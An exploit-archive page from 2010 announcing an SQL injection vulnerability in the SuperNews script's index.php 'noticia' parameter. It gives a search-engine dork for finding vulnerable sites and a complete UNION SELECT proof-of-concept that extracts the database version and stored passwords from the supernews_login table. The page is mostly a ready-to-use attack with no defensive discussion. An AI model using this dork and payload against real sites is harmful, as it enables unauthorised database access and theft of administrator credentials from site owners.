Home / os / winme

SuperNews (index.php) SQL Injection Vulnerability

Posted on 26 March 2010

=================================================
SuperNews (index.php) SQL Injection Vulnerability
=================================================


#############################################################
SuperNews (index.php) SQL Injection Vulnerability
#############################################################
###################################################
#[~] Author : d4rk-h4ck3r
#[~] Tunisian Security Team
###################################################
Dork:
inurl:/admin/adm_noticias.php
Exploit:
http://www.site.com/[path]/index.php?noticia=[SQLi]
PoC Demo:
index.php?noticia=null/**/union/**/all/**/select/**/1,2,3,4,@@version,pass,7/**/from/**/supernews_login
Greetz:Passeword & Maxilog & all vbspiders members
home page : http://www.dark-buy.com


# Inj3ct0r.com [2010-03-26]

 

TOP

Malware :

Exploits :